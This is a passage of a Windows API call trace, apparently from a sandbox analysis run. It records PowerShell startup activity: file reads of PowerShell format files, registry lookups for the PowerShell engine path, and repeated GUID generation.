hFile=0x344, lpBuffer=0x31441a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x31441a8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.643] GetLastError () returned 0x0 [0044.643] ReadFile (in: hFile=0x344, lpBuffer=0x31441a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x31441a8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.643] GetLastError () returned 0x0 [0044.643] ReadFile (in: hFile=0x344, lpBuffer=0x31441a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x31441a8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.643] GetLastError () returned 0x0 [0044.644] ReadFile (in: hFile=0x344, lpBuffer=0x31441a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x31441a8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.644] GetLastError () returned 0x0 [0044.644] ReadFile (in: hFile=0x344, lpBuffer=0x31441a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x31441a8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.644] GetLastError () returned 0x0 [0044.644] ReadFile (in: hFile=0x344, lpBuffer=0x31441a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x31441a8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.644] GetLastError () returned 0x0 [0044.644] ReadFile (in: hFile=0x344, lpBuffer=0x31441a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x31441a8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.645] GetLastError () returned 0x0 [0044.645] ReadFile (in: hFile=0x344, lpBuffer=0x31441a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x31441a8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.645] GetLastError () returned 0x0 [0044.645] ReadFile (in: hFile=0x344, lpBuffer=0x31441a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x31441a8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.645] GetLastError () returned 0x0 [0044.645] ReadFile (in: hFile=0x344, lpBuffer=0x31441a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x31441a8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.645] GetLastError () returned 0x0 [0044.645] ReadFile (in: hFile=0x344, lpBuffer=0x31441a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x31441a8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.645] GetLastError () returned 0x0 [0044.645] ReadFile (in: hFile=0x344, lpBuffer=0x31441a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x31441a8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.645] GetLastError () returned 0x0 [0044.645] ReadFile (in: hFile=0x344, lpBuffer=0x31441a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x31441a8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.645] GetLastError () returned 0x0 [0044.645] ReadFile (in: hFile=0x344, lpBuffer=0x31441a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x31441a8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.646] GetLastError () returned 0x0 [0044.647] ReadFile (in: hFile=0x344, lpBuffer=0x31441a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x31441a8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.647] GetLastError () returned 0x0 [0044.647] ReadFile (in: hFile=0x344, lpBuffer=0x31441a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x31441a8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.647] GetLastError () returned 0x0 [0044.647] ReadFile (in: hFile=0x344, lpBuffer=0x31441a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x31441a8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.647] GetLastError () returned 0x0 [0044.647] ReadFile (in: hFile=0x344, lpBuffer=0x31441a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x31441a8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.647] GetLastError () returned 0x0 [0044.647] ReadFile (in: hFile=0x344, lpBuffer=0x31441a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x31441a8*, lpNumberOfBytesRead=0x25e394*=0xe67, lpOverlapped=0x0) returned 1 [0044.648] GetLastError () returned 0x0 [0044.648] ReadFile (in: hFile=0x344, lpBuffer=0x31437af, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x31437af*, lpNumberOfBytesRead=0x25e394*=0x0, lpOverlapped=0x0) returned 1 [0044.648] GetLastError () returned 0x0 [0044.648] ReadFile (in: hFile=0x344, lpBuffer=0x31441a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x31441a8*, lpNumberOfBytesRead=0x25e394*=0x0, lpOverlapped=0x0) returned 1 [0044.648] GetLastError () returned 0x0 [0044.648] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e318 | out: phkResult=0x25e318*=0x344) returned 0x0 [0044.648] RegQueryValueExW (in: hKey=0x344, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e360, lpData=0x0, lpcbData=0x25e35c*=0x0 | out: lpType=0x25e360*=0x1, lpData=0x0, lpcbData=0x25e35c*=0x56) returned 0x0 [0044.648] RegQueryValueExW (in: hKey=0x344, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e360, lpData=0x54e2a0, lpcbData=0x25e35c*=0x56 | out: lpType=0x25e360*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x25e35c*=0x56) returned 0x0 [0044.648] RegCloseKey (hKey=0x344) returned 0x0 [0044.649] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xb9c80ffe, Data2=0x8544, Data3=0x4ef8, Data4=([0]=0xbc, [1]=0x76, [2]=0x6, [3]=0xb1, [4]=0xcc, [5]=0x92, [6]=0x70, [7]=0xbf))) returned 0x0 [0044.649] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xb9129274, Data2=0xcda7, Data3=0x4aca, Data4=([0]=0x8d, [1]=0x4, [2]=0x65, [3]=0x13, [4]=0x3, [5]=0xba, [6]=0x8d, [7]=0xd8))) returned 0x0 [0044.649] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x290ee3af, Data2=0xa510, Data3=0x4cae, Data4=([0]=0x81, [1]=0x3a, [2]=0xc8, [3]=0x2a, [4]=0xd7, [5]=0x1a, [6]=0x56, [7]=0xc8))) returned 0x0 [0044.649] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x92a539cc, Data2=0x8955, Data3=0x43ca, Data4=([0]=0x9b, [1]=0x73, [2]=0xec, [3]=0xda, [4]=0xf4, [5]=0x60, [6]=0x7f, [7]=0xa0))) returned 0x0 [0044.649] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x2f3fb6bd, Data2=0xdf94, Data3=0x4801, Data4=([0]=0x80, [1]=0xb8, [2]=0x48, [3]=0x63, [4]=0xa1, [5]=0x3c, [6]=0x51, [7]=0x80))) returned 0x0 [0044.649] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xfc9f38e0, Data2=0x7c5c, Data3=0x46d4, Data4=([0]=0xa0, [1]=0xa2, [2]=0xa0, [3]=0xa9, [4]=0x8e, [5]=0x4c, [6]=0x72, [7]=0xba))) returned 0x0 [0044.649] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x564410cf, Data2=0xfff8, Data3=0x47fb, Data4=([0]=0x90, [1]=0x9d, [2]=0xa5, [3]=0x64, [4]=0x53, [5]=0xa4, [6]=0x39, [7]=0x8b))) returned 0x0 [0044.649] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xb2055e80, Data2=0xa35e, Data3=0x4bb7, Data4=([0]=0xbd, [1]=0xcd, [2]=0x6b, [3]=0x26, [4]=0x39, [5]=0x4e, [6]=0x6f, [7]=0x9))) returned 0x0 [0044.649] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x7aa3312e, Data2=0xd613, Data3=0x422c, Data4=([0]=0xab, [1]=0x87, [2]=0xea, [3]=0x26, [4]=0xad, [5]=0xf2, [6]=0x9a, [7]=0x76))) returned 0x0 [0044.649] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x9cd01d78, Data2=0xcd82, Data3=0x43fa, Data4=([0]=0xbf, [1]=0x60, [2]=0xcd, [3]=0xf8, [4]=0x1d, [5]=0xa8, [6]=0x84, [7]=0xcf))) returned 0x0 [0044.650] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x904aa275, Data2=0x9e0c, Data3=0x4ffc, Data4=([0]=0xae, [1]=0x12, [2]=0x4e, [3]=0xb5, [4]=0xea, [5]=0x3e, [6]=0x1e, [7]=0x5d))) returned 0x0 [0044.650] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x4afc2834, Data2=0xe170, Data3=0x4d23, Data4=([0]=0xb1, [1]=0xa5, [2]=0x6f, [3]=0xe3, [4]=0x1f, [5]=0x44, [6]=0x3b, [7]=0x22))) returned 0x0 [0044.650] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x826ba574, Data2=0x1292, Data3=0x42af, Data4=([0]=0x9c, [1]=0x29, [2]=0xaa, [3]=0xa7, [4]=0x3b, [5]=0xd1, [6]=0x30, [7]=0xe2))) returned 0x0 [0044.650] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xc8ba26df, Data2=0x879c, Data3=0x435a, Data4=([0]=0xb0, [1]=0x42, [2]=0xc8, [3]=0x87, [4]=0xa3, [5]=0x52, [6]=0xcf, [7]=0xb6))) returned 0x0 [0044.650] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xfad3842b, Data2=0x70f7, Data3=0x4113, Data4=([0]=0xbd, [1]=0x1b, [2]=0xb7, [3]=0xda, [4]=0x2a, [5]=0xef, [6]=0x87, [7]=0xf7))) returned 0x0 [0044.650] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x5ebafc1f, Data2=0xbc34, Data3=0x445f, Data4=([0]=0xbc, [1]=0xbd, [2]=0x54, [3]=0x23, [4]=0xd, [5]=0xce, [6]=0x5b, [7]=0x17))) returned 0x0 [0044.650] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x51db781c, Data2=0xbfdb, Data3=0x43c7, Data4=([0]=0x9d, [1]=0xc2, [2]=0x8b, [3]=0x93, [4]=0x5f, [5]=0x3f, [6]=0x17, [7]=0x49))) returned 0x0 [0044.650] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x12a452bf, Data2=0x689a, Data3=0x44a6, Data4=([0]=0x9e, [1]=0x4, [2]=0x76, [3]=0xf4, [4]=0xdd, [5]=0x7f, [6]=0x7b, [7]=0x3e))) returned 0x0 [0044.650] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x39a558ca, Data2=0xbb74, Data3=0x4c40, Data4=([0]=0xb3, [1]=0xd4, [2]=0x76, [3]=0xc5, [4]=0x99, [5]=0x65, [6]=0x4e, [7]=0x84))) returned 0x0 [0044.650] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xc498b335, Data2=0x4df1, Data3=0x468f, Data4=([0]=0x9b, [1]=0xf3, [2]=0x34, [3]=0xe1, [4]=0xcd, [5]=0xd, [6]=0x8a, [7]=0xc4))) returned 0x0 [0044.650] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x9b7f0b4a, Data2=0x7984, Data3=0x4c7d, Data4=([0]=0xa2, [1]=0x30, [2]=0xe5, [3]=0xab, [4]=0xf3, [5]=0x57, [6]=0x8d, [7]=0x14))) returned 0x0 [0044.650] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xf4805184, Data2=0xeb12, Data3=0x4762, Data4=([0]=0x95, [1]=0x33, [2]=0x3a, [3]=0x26, [4]=0x8c, [5]=0xbc, [6]=0xba, [7]=0xd))) returned 0x0 [0044.651] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x6b9aec23, Data2=0x2816, Data3=0x4dba, Data4=([0]=0x8a, [1]=0x5c, [2]=0x2b, [3]=0xba, [4]=0xed, [5]=0xe3, [6]=0x81, [7]=0x9a))) returned 0x0 [0044.651] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xdd50598a, Data2=0xfe4c, Data3=0x47c0, Data4=([0]=0xb4, [1]=0x18, [2]=0x8f, [3]=0x86, [4]=0xeb, [5]=0x1d, [6]=0x4e, [7]=0xf9))) returned 0x0 [0044.651] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x9eaa253d, Data2=0xa975, Data3=0x4aa5, Data4=([0]=0x9b, [1]=0x3b, [2]=0xa7, [3]=0x69, [4]=0x84, [5]=0x32, [6]=0xf9, [7]=0x2f))) returned 0x0 [0044.651] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xc2d3d764, Data2=0x38c7, Data3=0x4609, Data4=([0]=0xb3, [1]=0x96, [2]=0xdc, [3]=0x1, [4]=0x24, [5]=0x89, [6]=0x8d, [7]=0x8f))) returned 0x0 [0044.651] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xf185bb9, Data2=0xc523, Data3=0x4937, Data4=([0]=0xba, [1]=0x4f, [2]=0xea, [3]=0x26, [4]=0x87, [5]=0x6d, [6]=0x1b, [7]=0xf3))) returned 0x0 [0044.651] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xcb611ce5, Data2=0xaf46, Data3=0x43bc, Data4=([0]=0xb6, [1]=0x96, [2]=0x29, [3]=0x4f, [4]=0x15, [5]=0x78, [6]=0x6, [7]=0xd8))) returned 0x0 [0044.651] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x5e851dc9, Data2=0x4954, Data3=0x45e7, Data4=([0]=0x8f, [1]=0x5, [2]=0xfe, [3]=0x35, [4]=0x1d, [5]=0xd, [6]=0x6a, [7]=0xb4))) returned 0x0 [0044.651] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xd0199cf4, Data2=0x1285, Data3=0x4be3, Data4=([0]=0x82, [1]=0xfb, [2]=0xde, [3]=0x8f, [4]=0xa3, [5]=0x4f, [6]=0x5b, [7]=0xe6))) returned 0x0 [0044.651] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x9e68284f, Data2=0xf86f, Data3=0x47ef, Data4=([0]=0x93, [1]=0xd0, [2]=0xe7, [3]=0xb8, [4]=0x4b, [5]=0xc5, [6]=0x7, [7]=0x47))) returned 0x0 [0044.651] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x7a9b7176, Data2=0x8433, Data3=0x4240, Data4=([0]=0xa2, [1]=0x16, [2]=0xdb, [3]=0xca, [4]=0xd9, [5]=0x30, [6]=0xf6, [7]=0x9a))) returned 0x0 [0044.651] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x47fd2c66, Data2=0xb00c, Data3=0x4c27, Data4=([0]=0x84, [1]=0x75, [2]=0x34, [3]=0x42, [4]=0x6f, [5]=0x98, [6]=0xc3, [7]=0x9f))) returned 0x0 [0044.652] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x7b7bc44f, Data2=0x6dc5, Data3=0x462f, Data4=([0]=0xba, [1]=0xea, [2]=0xc0, [3]=0xe4, [4]=0x4, [5]=0x32, [6]=0xf8, [7]=0x2d))) returned 0x0 [0044.652] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x3cdd59ee, Data2=0x5452, Data3=0x42ed, Data4=([0]=0x83, [1]=0x33, [2]=0x9d, [3]=0xf4, [4]=0xe6, [5]=0xc2, [6]=0x68, [7]=0xb7))) returned 0x0 [0044.652] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xd3332466, Data2=0x91d7, Data3=0x4558, Data4=([0]=0x89, [1]=0xa, [2]=0x4b, [3]=0xc3, [4]=0xcf, [5]=0xb, [6]=0xc, [7]=0x7a))) returned 0x0 [0044.652] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xf3a03c63, Data2=0xfb34, Data3=0x483a, Data4=([0]=0xb1, [1]=0xab, [2]=0xcd, [3]=0x47, [4]=0x8e, [5]=0x8d, [6]=0x1c, [7]=0xa9))) returned 0x0 [0044.652] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x251c5160, Data2=0x12df, Data3=0x4714, Data4=([0]=0xba, [1]=0x6, [2]=0x44, [3]=0xc7, [4]=0x22, [5]=0x45, [6]=0x17, [7]=0x4a))) returned 0x0 [0044.652] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x50d1904f, Data2=0xbfe7, Data3=0x4b05, Data4=([0]=0x83, [1]=0x8d, [2]=0x27, [3]=0x4b, [4]=0x81, [5]=0x91, [6]=0xa4, [7]=0x46))) returned 0x0 [0044.652] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x22a64a1c, Data2=0x6f33, Data3=0x45f5, Data4=([0]=0xad, [1]=0x5, [2]=0x97, [3]=0x4e, [4]=0xe, [5]=0x6d, [6]=0x3c, [7]=0xe7))) returned 0x0 [0044.652] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xff0314bd, Data2=0xd2b7, Data3=0x4cb0, Data4=([0]=0x82, [1]=0x4d, [2]=0xd2, [3]=0x41, [4]=0xba, [5]=0x55, [6]=0x51, [7]=0x72))) returned 0x0 [0044.653] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x464f49e6, Data2=0xd4e8, Data3=0x416a, Data4=([0]=0xba, [1]=0xcf, [2]=0x5d, [3]=0xa7, [4]=0x43, [5]=0xd3, [6]=0xee, [7]=0x24))) returned 0x0 [0044.653] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xd5a90136, Data2=0xfadf, Data3=0x428e, Data4=([0]=0x94, [1]=0x7d, [2]=0x50, [3]=0xf9, [4]=0x87, [5]=0xf6, [6]=0xa4, [7]=0xa4))) returned 0x0 [0044.653] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x1bb18657, Data2=0xeba0, Data3=0x4a90, Data4=([0]=0xad, [1]=0x34, [2]=0x62, [3]=0xe4, [4]=0x6e, [5]=0xe5, [6]=0xe1, [7]=0x1b))) returned 0x0 [0044.653] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x84b5a232, Data2=0x8d30, Data3=0x4db0, Data4=([0]=0x9b, [1]=0x5, [2]=0x7d, [3]=0x7e, [4]=0xc0, [5]=0x6b, [6]=0x4a, [7]=0x23))) returned 0x0 [0044.653] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xa29043d, Data2=0xcf8a, Data3=0x4fb1, Data4=([0]=0xa8, [1]=0xe5, [2]=0xcf, [3]=0xb8, [4]=0x49, [5]=0x37, [6]=0x97, [7]=0x1c))) returned 0x0 [0044.653] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xa1e8e1b6, Data2=0xe618, Data3=0x417f, Data4=([0]=0xa8, [1]=0x95, [2]=0x6f, [3]=0x3e, [4]=0xb5, [5]=0x42, [6]=0xe, [7]=0xf9))) returned 0x0 [0044.653] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x1ae3a480, Data2=0x98bb, Data3=0x477c, Data4=([0]=0xb4, [1]=0x72, [2]=0x2a, [3]=0x90, [4]=0x8, [5]=0xe, [6]=0x98, [7]=0xdc))) returned 0x0 [0044.654] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x344 [0044.654] GetLastError () returned 0x0 [0044.654] GetFileType (hFile=0x344) returned 0x1 [0044.654] SetErrorMode (uMode=0x1) returned 0x1 [0044.654] GetFileType (hFile=0x344) returned 0x1 [0044.654] ReadFile (in: hFile=0x344, lpBuffer=0x3234b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3234b80*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.655] GetLastError () returned 0x0 [0044.655] ReadFile (in: hFile=0x344, lpBuffer=0x3234b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3234b80*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.655] GetLastError () returned 0x0 [0044.656] ReadFile (in: hFile=0x344, lpBuffer=0x3234b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3234b80*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.656] GetLastError () returned 0x0 [0044.656] ReadFile (in: hFile=0x344, lpBuffer=0x3234b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3234b80*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.656] GetLastError () returned 0x0 [0044.656] ReadFile (in: hFile=0x344, lpBuffer=0x3234b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3234b80*, lpNumberOfBytesRead=0x25e394*=0x8b4, lpOverlapped=0x0) returned 1 [0044.656] GetLastError () returned 0x0 [0044.657] ReadFile (in: hFile=0x344, lpBuffer=0x3233fd4, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3233fd4*, lpNumberOfBytesRead=0x25e394*=0x0, lpOverlapped=0x0) returned 1 [0044.657] GetLastError () returned 0x0 [0044.657] ReadFile (in: hFile=0x344, lpBuffer=0x3234b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3234b80*, lpNumberOfBytesRead=0x25e394*=0x0, lpOverlapped=0x0) returned 1 [0044.657] GetLastError () returned 0x0 [0044.657] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e318 | out: phkResult=0x25e318*=0x344) returned 0x0 [0044.657] RegQueryValueExW (in: hKey=0x344, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e360, lpData=0x0, lpcbData=0x25e35c*=0x0 | out: lpType=0x25e360*=0x1, lpData=0x0, lpcbData=0x25e35c*=0x56) returned 0x0 [0044.657] RegQueryValueExW (in: hKey=0x344, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e360, lpData=0x54e2a0, lpcbData=0x25e35c*=0x56 | out: lpType=0x25e360*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x25e35c*=0x56) returned 0x0 [0044.657] RegCloseKey (hKey=0x344) returned 0x0 [0044.657] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xfde18093, Data2=0x5174, Data3=0x451d, Data4=([0]=0xbd, [1]=0x37, [2]=0xad, [3]=0x1, [4]=0xe2, [5]=0x5c, [6]=0x81, [7]=0x50))) returned 0x0 [0044.658] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x716835db, Data2=0xb020, Data3=0x4b53, Data4=([0]=0x83, [1]=0xb0, [2]=0x64, [3]=0x7c, [4]=0x22, [5]=0x88, [6]=0xcd, [7]=0x27))) returned 0x0 [0044.658] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x344 [0044.658] GetLastError () returned 0x0 [0044.658] GetFileType (hFile=0x344) returned 0x1 [0044.658] SetErrorMode (uMode=0x1) returned 0x1 [0044.658] GetFileType (hFile=0x344) returned 0x1 [0044.658] ReadFile (in: hFile=0x344, lpBuffer=0x326ba8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x326ba8c*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.659] GetLastError () returned 0x0 [0044.660] ReadFile (in: hFile=0x344, lpBuffer=0x326ba8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x326ba8c*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.660] GetLastError () returned 0x0 [0044.660] ReadFile (in: hFile=0x344, lpBuffer=0x326ba8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x326ba8c*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.660] GetLastError () returned 0x0 [0044.660] ReadFile (in: hFile=0x344, lpBuffer=0x326ba8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x326ba8c*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.660] GetLastError () returned 0x0 [0044.661] ReadFile (in: hFile=0x344, lpBuffer=0x326ba8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x326ba8c*, lpNumberOfBytesRead=0x25e394*=0xe98, lpOverlapped=0x0) returned 1 [0044.661] GetLastError () returned 0x0 [0044.661] ReadFile (in: hFile=0x344, lpBuffer=0x326b0c4, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x326b0c4*, lpNumberOfBytesRead=0x25e394*=0x0, lpOverlapped=0x0) returned 1 [0044.661] GetLastError () returned 0x0 [0044.661] ReadFile (in: hFile=0x344, lpBuffer=0x326ba8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x326ba8c*, lpNumberOfBytesRead=0x25e394*=0x0, lpOverlapped=0x0) returned 1 [0044.661] GetLastError () returned 0x0 [0044.661] RegOpenKeyExW (in: hKey=0x80000002, 